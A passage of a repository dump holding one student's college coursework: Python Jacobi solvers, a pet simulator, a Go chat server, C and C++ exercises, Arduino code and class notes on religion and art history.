= headers[0] - 1\n max_columns = headers[1] - 1\n\n # Create the first row.\n result = empty_matrix(source, headers)\n\n swap = True\n for i in range(100):\n # For every row preform jacobi\n for y in range(1, max_rows):\n # Store the current jacobi values in a temp row\n for x in range(1, max_columns):\n if(swap):\n result[x][y] = 0.25 * (float(source[x-1][y]) + float(source[x+1][y]) +\n float(source[x][y-1]) + float(source[x][y+1]))\n else:\n source[x][y] = 0.25 * (float(result[x-1][y]) + float(result[x+1][y]) +\n float(result[x][y-1]) + float(result[x][y+1]))\n swap = not(swap)\n\n return result\n\n\ndef main():\n # Used to house the 1D variant of the array\n jacobi_data_flat = list()\n # Used to house x and y\n headers = None\n\n # Open the file\n with open(\"test.in\", \"r\") as file:\n # Clean the data for later processing\n raw_data = file.read()\n raw_data = raw_data.replace(\"\\n\", \" \")\n raw_data = raw_data.replace(\"\\r\", \" \")\n raw_data = raw_data.replace(\" \", \" \")\n jacobi_data_flat = raw_data.split(\" \")\n\n # Strip out the headers\n headers = (int(jacobi_data_flat[0]), int(jacobi_data_flat[1]))\n jacobi_data_flat = jacobi_data_flat[2:-1]\n # Conver the 1D list to a 2D list\n jacobi_data = roll_matrix(jacobi_data_flat, headers)\n\n # Preform jacobi on the lsit\n jacobi_result = jacobi(jacobi_data, headers)\n\n # Save the results\n write_data(jacobi_result, headers)\n\ndef write_data(data, headers):\n \"\"\" Writes out the Jacobi data\"\n\n Args:\n data - A 2D list containing the data\n headers - The size of the list\n\n Returns:\n Creates a file named jacboi.out\n \"\"\"\n\n # Open a file\n with open(\"1024x1024.jacobi.out\", \"w\") as file:\n # Write out the headers\n file.write(str(headers[0]) + \" \")\n file.write(str(headers[1]) + \"\\n\")\n\n # Write out each row\n for row in data:\n for entry in row:\n file.write(str(entry) + \" \")\n else:\n file.write(\"\\n\")\n\ndef roll_matrix(flat, headers):\n \"\"\" Takes a 1D list and makes it 2D\n\n Args:\n flat - The 1D list\n headers - Tuple of x and y\n\n Returns:\n list of 2D source values\n \"\"\"\n\n # Empty list\n jacobi_data = list()\n\n # Strip out a rows worth of data and add it to the list\n for index in range(headers[1]):\n start = index * headers[1]\n end = ((index + 1) * headers[1])\n row_data = flat[start:end]\n for i in range(len(row_data)):\n row_data[i] = int(row_data[i])\n jacobi_data.append(row_data)\n return jacobi_data\n\nmain()\n\n" }, { "alpha_fraction": 0.5605006814002991, "alphanum_fraction": 0.563282310962677, "avg_line_length": 26.11320686340332, "blob_id": "f1cfe05fee89f5a2ebeeafa90508918d4a3db8fc", "content_id": "e3e79c86eef5ff2db7c9be058eec1529e49a6420", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1438, "license_type": "no_license", "max_line_length": 62, "num_lines": 53, "path": "/CSC 236 - Software Design/PetSimulator/owner.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "from food import Food\nfrom pet import Pet\nimport random\n\nclass Owner():\n\n def __init__(self, name):\n \"\"\" Creates an owner for the pets \"\"\"\n self.name = name\n\n # Each owner may have muliple pets\n self.pets = list()\n\n def set_name(self, name):\n \"\"\" Set the name of the owner \"\"\"\n self.name = name\n\n def get_name(self):\n \"\"\" Gets the name of the owner \"\"\"\n return self.name\n\n def add_pet(self, pet):\n \"\"\" Adds a pet to the owner's list \"\"\"\n self.pets.append(pet)\n\n def remove_pet(self, pet):\n \"\"\" Removes a pet from the owner's list \"\"\"\n self.pets.remove(pet)\n\n def get_pets(self):\n \"\"\" Returns all the user's pets \"\"\"\n return self.pets\n\n def get_pet_count(self):\n \"\"\" Returns the amount of pets that thee user has \"\"\"\n return len(self.pets)\n\n def get_random_pet(self):\n \"\"\" Returns a random pet \"\"\"\n return random.choice(self.pets)\n\n def play(self, pet):\n \"\"\" Let's the owner play with one of thier pets \"\"\"\n happiness = pet.get_happiness()\n adjustment = pet.adjust_happines(random.randint(1,20))\n def feed(self, pet, food):\n \"\"\" Let's the owner feed one of thier pets \"\"\"\n hunger = pet.get_hunger()\n name = pet.get_name()\n\n fillness = food.get_fillness()\n food_name = food.get_name()\n pet.adjust_hunger(-1 * fillness)\n\n" }, { "alpha_fraction": 0.6703671813011169, "alphanum_fraction": 0.6737830638885498, "avg_line_length": 25.0222225189209, "blob_id": "b10a277cfa9f87f4f0dd2bf20d555c32e71db786", "content_id": "04a31ea9b3c2859605654341e0b4c6642d0b5cd3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 1171, "license_type": "no_license", "max_line_length": 70, "num_lines": 45, "path": "/CSC 420 - Programming Languages/GO/TalkTalk/TalkTalk.go", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "/* tick-tock.go */\npackage main\n\nimport (\n\t\"fmt\"\n\t\"log\"\n\t\"net/http\"\n)\n\nvar chat = make(map[string]string)\n\nfunc post_message(writer http.ResponseWriter, request *http.Request) {\n\trequest.ParseForm()\n\tvar message string = request.Form.Get(\"Message\")\n\tvar username string = request.Form.Get(\"Username\")\n\tvar channel string = request.Form.Get(\"Channel\")\n\tif message != \"\" {\n\t\tif _, exists := chat[channel]; exists {\n\n\t\t\tchat[channel] += username + \" ~> \" + message + \"\\n\"\n\t\t} else {\n\t\t\tchat[channel] = username + \" ~> \" + message + \"\\n\"\n\t\t}\n\t\tfmt.Println(channel)\n\t}\n\tfmt.Fprintf(writer, chat[channel])\n}\n\nfunc checkMessage(writer http.ResponseWriter, request *http.Request) {\n\trequest.ParseForm()\n\tvar channel string = request.Form.Get(\"Channel\")\n\tvar username string = request.Form.Get(\"Username\")\n\tif _, exists := chat[channel]; !exists {\n\t\tchat[channel] = username + \" Created \" + channel + \"\\n\"\n\t}\n\tfmt.Fprintf(writer, chat[channel])\n\tfmt.Println(channel)\n}\n\nfunc main() {\n\thttp.Handle(\"/\", http.FileServer(http.Dir(\".static\")))\n\thttp.HandleFunc(\"/post_message\", post_message)\n\thttp.HandleFunc(\"/messages\", checkMessage)\n\tlog.Fatal(http.ListenAndServe(\":9999\", nil))\n}\n" }, { "alpha_fraction": 0.5074074268341064, "alphanum_fraction": 0.5333333611488342, "avg_line_length": 21.5, "blob_id": "c7be27db0fdbe503be2d6f91167604ceefc3982d", "content_id": "d2ac04d37773c4e2384a80bc2fbf808dd4f9eaeb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 270, "license_type": "no_license", "max_line_length": 67, "num_lines": 12, "path": "/CSC 386 - Embedded Systems/C_Basic/State_Machine_1/ext6.c", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "#include <stdio.h>\nint main(){\n int limit = 20;\n for(int i = 0; limit > i; i++){\n int summation = 0;\n for(int count = 0; i > count; count++){\n summation += count;\n }\n printf(\"The sum of the numbers 0 to %d is %d\\n\", i, summation);\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.5631529092788696, "alphanum_fraction": 0.5707502365112305, "avg_line_length": 24.071428298950195, "blob_id": "01c569ecb5f5178cbef6062ee471f45712c3accf", "content_id": "63f15f445f8abfad1615abd5189c5346258b9a0e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1053, "license_type": "no_license", "max_line_length": 84, "num_lines": 42, "path": "/CSC 386 - Embedded Systems/C_Basic/State_Machine_2/vowel_count.c", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdlib.h>\n#include <stdbool.h>\n#include <unistd.h>\n#include <ctype.h>\n\n#define READING 0\n#define COUNT 1\n\nint main(int argc, char* argv[]){\n /* Any text is allowed but only vowels are counted\n * Takes a file in as input\n */\n if (argc < 2){\n printf(\"Please use with a file: ./a.out filepath example ./a.out text.txt\\n\");\n return -1;\n }\n\n char* filepath = argv[1];\n FILE* text = fopen(filepath, \"r\");\n int vowel_count = 0;\n int state = READING;\n char character = '\\0';\n do{\n switch(state){\n /* Starts by reading then goes to count stage when a vowel is fond and back */\n case READING:\n character = fgetc(text);\n character = tolower(character);\n if (character == 'a' || character == 'e' || character == 'i'||\n character == 'o' || character == 'u'){\n state = COUNT;\n }\n break;\n case COUNT:\n vowel_count += 1;\n state = READING;\n break;\n }\n }while(character != EOF);\n printf(\"%d vowels found\\n\", vowel_count);\n}\n" }, { "alpha_fraction": 0.52491694688797, "alphanum_fraction": 0.5259135961532593, "avg_line_length": 27.93269157409668, "blob_id": "73c82135f7e503015988b1ba91813cf4644d5646", "content_id": "f25334f38c8a1bd9bba6388cb8a41fcc9e2ce7da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3010, "license_type": "no_license", "max_line_length": 77, "num_lines": 104, "path": "/CSC 236 - Software Design/War/deck.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "\"\"\" Created by Jesson Soto Ventura\n CSC 236 -\n Creates a Card Class, which will allow operator overriding.\n Creates a StackedDeck and QueuedDeck, which inheriets the Stack and Queue\n class to simplify the use.\n\"\"\"\n\nfrom queue import Queue\nfrom stack import Stack\n\nclass Card(object):\n def __init__(self, number):\n \"\"\" Enables the use of a card type\"\"\"\n self.number = number\n\n def get_number(self):\n \"\"\" Returns the number of the card\"\"\"\n return self.number\n\n def __gt__(self, other):\n \"\"\" Allows greater than comparisons on cards\n pre: Two Cards\n post: A boolean indicating greatness \n \"\"\"\n if isinstance(other, Card):\n if self.get_number() > other.get_number():\n return True\n else:\n return False\n def __lt__(self, other):\n \"\"\" Allows less than comparisons on cards\n pre: Two Cards\n post: A boolean indicating lessness \n \"\"\"\n if isinstance(other, Card):\n if self.get_number() < other.get_number():\n return True\n else:\n return False\n\n def __eq__(self, other):\n \"\"\" Allows equals comparisons on cards\n pre: Two Cards\n post: A boolean indicating equalness\n \"\"\"\n if isinstance(other, Card):\n if self.get_number() == other.get_number():\n return True\n else:\n return False\n \n def __ne__(self, other):\n \"\"\" Allows less than comparisons on cards \n pre: Two Cards\n post: A boolean indicating not-equalness\n \"\"\"\n if isinstance(other, Card):\n if self.get_number() != other.get_number():\n return True\n else:\n return False\n\n def __str__(self):\n return str(self.get_number())\n\nclass QueuedDeck(Queue):\n \n def __init__(self):\n \"\"\" Creates a queued Deck\"\"\"\n super(QueuedDeck, self).__init__()\n\n def __add__(self,other):\n \"\"\" Allows cards to be added to the queue \n pre: A deck, and a Card\n post: A deck with the card added to the top\n \"\"\"\n if isinstance(other, Card):\n self.enqueue(other)\n else:\n raise NotImplemented\n\nclass StackedDeck(Stack):\n def __init__(self):\n \"\"\" Creates a Stacked Deck\"\"\"\n super(StackedDeck, self).__init__()\n \n def add(self, card):\n \"\"\" Adds card to the top of a stack.\n pre: a card\n post: places x on top of stack\n note: added to keep the sytax consistant with queued\n \"\"\"\n self.push(card)\n\n def __add__(self,other):\n \"\"\" Allows cards to be added to the queue \n pre: A deck, and a Card\n post: A deck with the card added to the top\n \"\"\"\n\n if isinstance(other, Card):\n self.push(other)\n else:\n raise NotImplemented\n\n" }, { "alpha_fraction": 0.48622366786003113, "alphanum_fraction": 0.5032414793968201, "avg_line_length": 19.915254592895508, "blob_id": "05c78bd13bd9c50763a4198465f3a71e7f5b483e", "content_id": "d689c754e39529c26c4f66efacca8a6c7481d342", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1234, "license_type": "no_license", "max_line_length": 66, "num_lines": 59, "path": "/CSC 386 - Embedded Systems/RC-Nespi/nes.ino", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "\"\"\" Code from https://eskerda.com/arduino-nes-gamepad/ \"\"\"\nint CLK = 2;\nint LATCH = 3;\nint DATA = 4;\n\nbyte last_read = 0xFF;\n\nvoid setup();\nvoid loop();\n\nvoid setup()\n{\n Serial.begin(115200);\n pinMode(CLK, OUTPUT);\n pinMode(LATCH, OUTPUT);\n pinMode(DATA, INPUT);\n}\n\nvoid loop()\n{\n byte reading = read_NESpad();\n if (reading != last_read){\n Serial.println(reading, BIN);\n }\n last_read = reading;\n}\n\nbyte read_NESpad() {\n /*\n NES Word Mapping\n x x x x x x x x\n | | | | | | | |_ A\n | | | | | | |___ B\n | | | | | |_____ SELECT\n | | | | |_______ START\n | | | |_________ UP\n | | |___________ DOWN\n | |_____________ LEFT\n |_______________ RIGHT\n */\n\n // Send a HIGH pulse to latch. Make 8 shift register store state\n // of all buttons\n digitalWrite(LATCH, HIGH);\n delayMicroseconds(12);\n digitalWrite(LATCH, LOW);\n\n // Clock the 8 shift register to get the\n // state of the buttons\n byte output = 0x00;\n for (int i = 0; i < 8; i++){\n output |= digitalRead(DATA) << i;\n digitalWrite(CLK, HIGH);\n delayMicroseconds(6);\n digitalWrite(CLK, LOW);\n delayMicroseconds(6);\n }\n return output;\n}\n" }, { "alpha_fraction": 0.5729166865348816, "alphanum_fraction": 0.5798611044883728, "avg_line_length": 27.024391174316406, "blob_id": "b2c0fec4dbf98c7e76caae361bb41d69e2496969", "content_id": "04f7f146820cc4a7aaf1cf04b7fddd4f2b295436", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1152, "license_type": "no_license", "max_line_length": 54, "num_lines": 41, "path": "/CSC 236 - Software Design/PetSimulator/pet.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "import random\nclass Pet:\n \"\"\" A class for all pet related attributes \"\"\"\n def __init__(self, name):\n \"\"\" Creates the pet\"\"\"\n\n self.name = name\n self.happiness = random.randint(20,50)\n self.hunger = random.randint(20, 50)\n\n def set_name(self, name):\n \"\"\" Sets the pet's name \"\"\"\n self.name = name\n\n def get_name(self):\n \"\"\" Gets the pet's name \"\"\"\n return self.name\n\n def get_hunger(self):\n \"\"\" Returns the hunger level of the pet \"\"\"\n return self.hunger\n\n def set_hunger(self, hunger):\n \"\"\" Sets the hunger level of the pet \"\"\"\n self.hunger = hunger\n\n def set_happiness(self, happiness):\n \"\"\" Sets the happiness level of the pet \"\"\"\n self.happiness = happiness\n\n def get_happiness(self):\n \"\"\" Sets the happiness level of pet\"\"\"\n return self.happiness\n\n def adjust_hunger(self, adjustment):\n \"\"\" Adjusts the hunger by a delta amount \"\"\"\n self.hunger += adjustment\n\n def adjust_happines(self, adjustment):\n \"\"\" Adjusts the happiness by a delta amount\"\"\"\n self.hunger += adjustment\n\n\n\n" }, { "alpha_fraction": 0.7647058963775635, "alphanum_fraction": 0.7647058963775635, "avg_line_length": 67, "blob_id": "1d4db2ad3224093cf411ffeebbac37a39fe39f3c", "content_id": "6ec9befeca3e980830de733951dd7be8ad05f998", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 68, "license_type": "no_license", "max_line_length": 67, "num_lines": 1, "path": "/AST 260 - Buddhism/Ascetic.md", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "# Would being alone not be an extreme and thus not the middle road?\n" }, { "alpha_fraction": 0.74622642993927, "alphanum_fraction": 0.74622642993927, "avg_line_length": 52, "blob_id": "19e823593304da445079eabe6b7f857e74ffa5c4", "content_id": "e13c7e2430e1539a2af0a2dd37b51678dafae6c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1060, "license_type": "no_license", "max_line_length": 169, "num_lines": 20, "path": "/GSTR 310 - Religion and Christianity/Quest For The Living God/Chapter 8.md", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "# Generous God Of The Religions\n\n# National Plurism\n * This is the idea that there is a dispersal of religion through nations. Not only has religion spread from the single place.\n * Diffusal of religion into the culture of a nation\n\n# Catholic Questions:\n * None baptised people be saved and the implications of that choice\n * Mercy reaches beyond the Christain word and sacrament\n * People are saved because of their relgion\n\n# Dialogs\n * Life - the religion of others is as true to them as it is to oneself, this can cause doubt amoust some or it can cause renewed faith\n * Theology - What does it mean to interact with a scholar of another religion, how does this shape the view of one religion over another\n *\n \n# Questions\n * Does the idea that the church would allow other religions to be saved a result of plurism or the spread of relativism \n * Has the spread of plurism possibly been the reason for the decline in religion amoust younger generations, could it also be the cause for a rise in agnositic views\n *\n" }, { "alpha_fraction": 0.7985028028488159, "alphanum_fraction": 0.7985028028488159, "avg_line_length": 176.88888549804688, "blob_id": "42c0043515733cc0980e6ebfbbd7cfcd1a591a81", "content_id": "1d4b65bebaf552cb4a6f4be63bea6e6caec4dce0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1603, "license_type": "no_license", "max_line_length": 1528, "num_lines": 9, "path": "/ARH 243 - Women In Art/Simons-dump.md", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "#Quick dump\n\nThe portrayal of women in portraits presents an interesting topic, in part due to how it reflects the ideals of the time. The assumptions that the art presented by gives not an idealized but a realistic view of the person is incorrect. The images act as a form of symbolism reflecting the masculine ownership views that were present at the time. These symbolic ideas of ownership are reflected in the manner in which women are painted as portraits. This artistic design presents women as flat objects that are to be gazed up. The presentation of a portrait reflects that of a women in a window, being caught. Furthermore, the inclusion of masculine symbolism represents the ownership that men had over the wife. The symbolism extends into the eyes, as the single side or adverted eye looks is intended to portray a woman who is loyal. As direct eye contact at the time symbolized the woman's lack of purity. A women who was assertive was seen as being a prostitute. The decorative dress and hair of the woman along with the extra accessorizes were a symbolism of the women's dowry. The intention of having large and eccentric was to show the status of women. Well technically though an image with a beautiful woman, with nice dowry does portray the idea of high status, the intent was to make the male husband be seen as being part of the elite. In this sense, women are seen as being property, as ready-made cash. They are treated as both property and seen as something to be used by men as a card to elevate their own status. \n\n# Other things\n- Property\n- Dowry\n- Status\n- Idealization\n\n\n" }, { "alpha_fraction": 0.5758441686630249, "alphanum_fraction": 0.5774025917053223, "avg_line_length": 22.522293090820312, "blob_id": "e2e860c83abc69b813ee113631437a5c908ddbad", "content_id": "9e11171943312e87d203d72fe171bee18aa813fa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3850, "license_type": "no_license", "max_line_length": 99, "num_lines": 157, "path": "/CSC 236 - Software Design/BST/BinarySearchTree-cpp.cpp", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "// Binary Search Tree\r\n// Created by Jan Pearce\r\n// Modified by Jesson Soto\r\n// Creates a binary search tree that is tranvsered in an order.\r\n// A16\r\n// Sotoventuraj\r\n\r\n#include<iostream>\r\nusing namespace std;\r\n\r\nclass BstNode\r\n{\r\n /* Creattes a BstNode class */\r\n public:\r\n int data;\r\n BstNode* left;\r\n BstNode* right;\r\n};\r\n\r\nBstNode* GetNewNode(int data)\r\n{\r\n /* Creates a new node. */\r\n\r\n BstNode* newNode = new BstNode();\r\n newNode->data = data;\r\n newNode->left = newNode->right = NULL;\r\n return newNode;\r\n}\r\n\r\nBstNode* insert(BstNode* head, int data)\r\n{\r\n /* Inserts a new node into the tree */\r\n\r\n if(head == NULL)\r\n {\r\n head = GetNewNode(data); // Base case\r\n }\r\n else if(data <= head->data)\r\n {\r\n head->left = insert(head->left, data); // Recursive case\r\n }\r\n\r\n else\r\n {\r\n head->right = insert(head->right, data);// Recursive case\r\n }\r\n return head;\r\n}\r\n\r\nvoid rawInput(BstNode** head_ptr){\r\n /* Takes in user input and lets them create a tree\r\n * Pre:\r\n * head_ptr - A pointer to the head, so that I can modify the head and\r\n * keep the void.\r\n * Post:\r\n * The head has been set to equal the top of the tree\r\n */\r\n\r\n // Ask the user for how many entries they have.\r\n int entries = 0;\r\n // Derefrence the head pointer.\r\n BstNode* head = *head_ptr;\r\n cout << \"How many entries would you like to make: \"<< endl;\r\n cin >> entries;\r\n\r\n // Get x number of inputs from the user.\r\n for(int i = 0; i < entries; i++){\r\n\r\n // Add the inputs to the tree.\r\n int input = 0;\r\n cin >> input;\r\n head = insert(head, input);\r\n }\r\n // Set the head equal to the new head.\r\n *head_ptr = head;\r\n}\r\n\r\nvoid in_order(BstNode* head){\r\n /* Prints the in order of the tree\r\n * Pre: Head - a BstNode that represents the root of the tree\r\n * Post: A in_order of the tree is printed out*/\r\n if (head->left != NULL){\r\n in_order(head->left); // Recursive case\r\n }\r\n if (head != NULL){\r\n cout << head->data << endl; // Base Case\r\n }\r\n if (head->right != NULL){\r\n in_order(head->right); // Recursive case\r\n }\r\n}\r\n\r\nvoid pre_order(BstNode* head){\r\n /* Prints the post order of the tree\r\n * Pre: Head - a BstNode that represents the root of the tree\r\n * Post: A post_order of the tree is printed out*/\r\n if (head != NULL){\r\n cout << head->data << endl; // Base Case\r\n }\r\n if (head->left != NULL){\r\n pre_order(head->left); // Recursive case\r\n }\r\n if (head->right != NULL){\r\n pre_order(head->right); // Recursive case\r\n }\r\n}\r\n\r\nvoid post_order(BstNode* head){\r\n /* Prints the post order of the tree\r\n * Pre: Head - a BstNode that represents the root of the tree\r\n * Post: A post_order of the tree is printed out*/\r\n if (head->left != NULL){\r\n post_order(head->left); // Recursive case\r\n }\r\n if (head->right != NULL){\r\n post_order(head->right); // Recursive case\r\n }\r\n if (head != NULL){\r\n cout << head->data << endl; // Base Case\r\n }\r\n}\r\n\r\nint main() {\r\n /* Allows a user to create a tree and then prints it out based on the formats that they choose */\r\n cout << \"Welcome this program builds trees and transverses them.\" << endl;\r\n BstNode* head = NULL;\r\n\r\n // Allow the user to input their text.\r\n rawInput(&head);\r\n\r\n // Ask the user if they want to print out a specific order.\r\n // Make sure that the head is not empty.\r\n string input = \"N\";\r\n if (head != NULL){\r\n cout << endl <<\"Show pre-order? Y o N\"<< endl;\r\n cin >> input;\r\n if(input == \"Y\"){\r\n pre_order(head);\r\n }\r\n input = \"N\";\r\n cout << endl<< \"Show in-order? Y o N\"<< endl;\r\n cin >> input;\r\n if(input == \"Y\"){\r\n in_order(head);\r\n }\r\n\r\n input = \"N\";\r\n cout << endl<< \"Show post-order? Y o N\"<< endl;\r\n cin >> input;\r\n if(input == \"Y\"){\r\n post_order(head);\r\n }\r\n }else{\r\n cout << \"Empty Tree\" << endl;\r\n }\r\n return 0;\r\n}\r\n" }, { "alpha_fraction": 0.6280737519264221, "alphanum_fraction": 0.6593237519264221, "avg_line_length": 26.478872299194336, "blob_id": "47c6518909ba0b4ea26d595847c7f0c0202255b4", "content_id": "040c9a76881b6c2fc666da25d7391641f07ee345", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1952, "license_type": "no_license", "max_line_length": 92, "num_lines": 71, "path": "/CSC 486 - Parallel and Distributed Systems/jacobi_cienfuegosj.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "#!/usr/bin/env\n# Javier Cienfuegos\n\n# Jacobi.py\n'''\nOpen the the file '1024x1024.jacobi.in'.\nRead the contents i.e dimensions and values.\nCreate a data structure with the same dimensions to store result\nStore the calculated values from the source structure to the new structure.\nCheck that the results of the previous iteration is the source for the next iteration.\nCreate an output file '1024x1024.jacobi.out'.\nWrite the dimensions and the resulting values into the file.\n'''\n\nimport sys\n\ndef jacobi(source,nIters):\n\n\tnumRows = len(source)\n\tnumCols = len(source[0])\n\tresult = [[0 for i in range(numRows)] for j in range(numCols)]\n\n\tfor j in range(numCols):\n\t\tresult[0][j] = source[0][j]\n\t\tresult[numCols-1][j] = source[numCols-1][j]\n\tfor i in range(numRows):\n\t\tresult[i][0] = source[i][0]\n\t\tresult[i][numRows-1] = source[i][numRows-1]\n\n\tswap = True\n\tfor i in range(nIters):\n\t\tfor i in range(1,numRows-1):\n\t\t\tfor j in range(1,numCols-1):\n\t\t\t\tif swap:\n\t\t\t\t\tresult[i][j] = 0.25*(source[i-1][j] + source[i+1][j] + source[i][j-1] + source[i][j+1])\n\t\t\t\telse:\n\t\t\t\t\tsource[i][j] = 0.25*(result[i-1][j] + result[i+1][j] + result[i][j-1] + result[i][j+1])\n\t\tswap = not(swap)\n\n\tif(nIters%2 == 0):\n\t\treturn result\n\telse:\n\t\treturn source\n\ndef main(argv):\n\n\tinFilename = sys.argv[1]\n\toutFilename = sys.argv[2]\n\n\twith open(inFilename) as inFile:\n\t\tcontent = inFile.readlines()\n\tnumRows = int(content[0].split(\" \")[0])\n\tnumCols = int(content[0].split(\" \")[1])\n\tsource = [[0 for i in range(numRows)] for j in range(numCols)]\n\n\tfor i in range(1,len(content)):\n\t\tfor j in range(numCols):\n\t\t\tcolelement = int(content[i].split(' ')[j])\n\t\t\tsource[i - 1][j] = colelement\n\tinFile.close()\n\n\tresult = jacobi(source=source,nIters=100)\n\n\twith open(outFilename,'w+') as outFile:\n\t\toutFile.write(\"{0} {1}\\n\".format(len(result),len(result[0])))\n\t\tfor row in result:\n\t\t\toutFile.write(' '.join(str(colval) for colval in row) + \"\\n\")\n\toutFile.close()\n\nif __name__ == '__main__':\n\tmain(sys.argv)\n\n" }, { "alpha_fraction": 0.7890625, "alphanum_fraction": 0.7900390625, "avg_line_length": 340.3333435058594, "blob_id": "6107c5737d4fd98b2fd19f0aabd24fb42fa91568", "content_id": "32e44cf28ab9e8bacd3a4649dd1805575a558790", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2048, "license_type": "no_license", "max_line_length": 1874, "num_lines": 6, "path": "/AST 260 - Buddhism/Buddist Wizard.md", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "# Summary\nIt is not typically possible to obtain enlightenment in a single life time. This was made hard due to the need to have the five limbs: faith, knowledge, sound body, and some other things. In particular, the changes in the human form have rendered it near impossible, disease, although certain steps can be taken which can extend the person's lifetime to beyond that of a typical human. This can be done through the use of elixars, that remove the person's dependence on unstable food. The elixars, are made of stable metals that will replace the fragile parts of the human body. However, these things are toxic, drinking mercury?. Anyways, the metals needed to be cooked before they could be consumed in a reasonable manner. It was also said that the Buddha claimed that anyone who was able to control their vital force would be able to live indefinitely. The buddha, decided to end his vital force three days in advance, that is why he died. This was done through the control of the four physic powers, which are will, effort, thought and wisdom. It is through control of these that a person can control their vital force. They also gain cool powers, like flying and stuff. Not sure at which point this occurs, but once one becomes a healer, they must heal all people. Also all healers are equal, regardless of the stage they are in. The next requirement is to have the merit, that is obtaining the ten perfections. Though they can only be obtained if the person's intentions are to reach nirvana, not to improve their future wealth. The latter is bad. Anyways, once a person is able to obtain patience and equanimity the other 8 are easy to obtain. With these 8, a person can obtain nirvana,by waiting until the passing of the buddha, at which point those close to nirvana will gain enlightenment. Though only some people will be able to see the two embers, and be awoken\n\n# Questions\n- So the actions must be done to go to nirvana?\n- The best one can obtain by doing good things in hope of a return is a life as a god or human again.\n" }, { "alpha_fraction": 0.5219836235046387, "alphanum_fraction": 0.5252215266227722, "avg_line_length": 29.623037338256836, "blob_id": "a33abade8c04c41e38340da8f939ef4d76f7e774", "content_id": "27bcf67241cef6e94fd83d48dc7d21acaeefe8f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5868, "license_type": "no_license", "max_line_length": 79, "num_lines": 191, "path": "/CSC 236 - Software Design/War/war.py", "repo_name": "Jessonsotoventura/Berea-College", "src_encoding": "UTF-8", "text": "\"\"\" Created by Jesson Soto Ventura\n Creates a class that impements the War game,\n to keep everything in one area.\n\"\"\"\n\nimport random\nfrom deck import QueuedDeck, StackedDeck, Card\n\nclass War:\n\n def __init__(self, name):\n \"\"\" Initalize all the decks and variables for the game \"\"\"\n self.name = name\n\n # Set up the decks\n self.dealing_pile = StackedDeck()\n self.playing_AI = StackedDeck()\n self.playing_player = StackedDeck()\n self.storage_AI = QueuedDeck()\n self.storage_player = QueuedDeck()\n self.loot = QueuedDeck()\n\n # Inital setup\n self.initalize_game()\n self.running = True\n\n def initalize_game(self):\n \"\"\" Sets up the decks \n pre: Empty Decks\n post: Initalized Decks\n\n \"\"\"\n\n self.populate_deck()\n self.distribute_cards()\n \n def distribute_cards(self):\n \"\"\"distributes the cards to each player\n pre: a full dealing_pile\n post: an empty dealing_pile with 25 cards per playing\n \"\"\"\n\n # Split the cards up between users\n for i in range(25):\n card = self.dealing_pile.pop()\n self.playing_AI + card\n\n card = self.dealing_pile.pop()\n self.playing_player + card\n\n def populate_deck(self):\n \"\"\" Populates the deck with 50 cards\n and shuffles them.\n pre: Empty deck\n post: A deck with 50 shuffled cards\n \"\"\"\n\n # Fill the deck with 50 cards\n cards = list()\n for i in range(5):\n for j in range(10):\n card = Card(j)\n cards.append(card)\n\n # Shuffles the cards\n random.shuffle(cards)\n\n # Adds the cards to the dealing_pile\n for card in cards:\n self.dealing_pile + card\n\n def play(self):\n \"\"\" Plays a round until there is a winner\n pre: a none empty deck\n post: none\n \"\"\"\n\n # Check to make sure that the deck is not empty\n self.check_deck()\n\n # Check to make sure that no winner has happend\n if self.running:\n player_card, AI_card = self.draw()\n\n # Check the winner\n if player_card != AI_card:\n if player_card > AI_card:\n print(\"Player \" + self.name + \" won!\")\n self.get_loot(self.storage_player)\n else:\n print(\"Player AI won!\")\n self.get_loot(self.storage_AI)\n else:\n # Burn two cards due to draw\n self.check_deck()\n if self.running:\n player_card, AI_card = self.draw()\n print(\"The cards were burned\")\n\n # Start over\n self.play()\n\n\n\n def draw(self):\n \"\"\" Draws a card for each player\n pre: a none empty deck\n post: two cards are returned\n \"\"\"\n\n # Draw two cards\n player_card = self.playing_player.pop()\n AI_card = self.playing_AI.pop()\n\n # Print the cards that are drawn\n print(\"Player \" + self.name + \" drew \" + str(player_card))\n print(\"Player AI drew \" + str(AI_card))\n\n # Add the cards as loot randomly pick one to add to the top, to prevent\n # neverending games.\n cards = [player_card, AI_card]\n random.shuffle(cards)\n self.add_loot(cards[0])\n self.add_loot(cards[1])\n\n return (player_card, AI_card)\n\n def get_loot(self, storage):\n 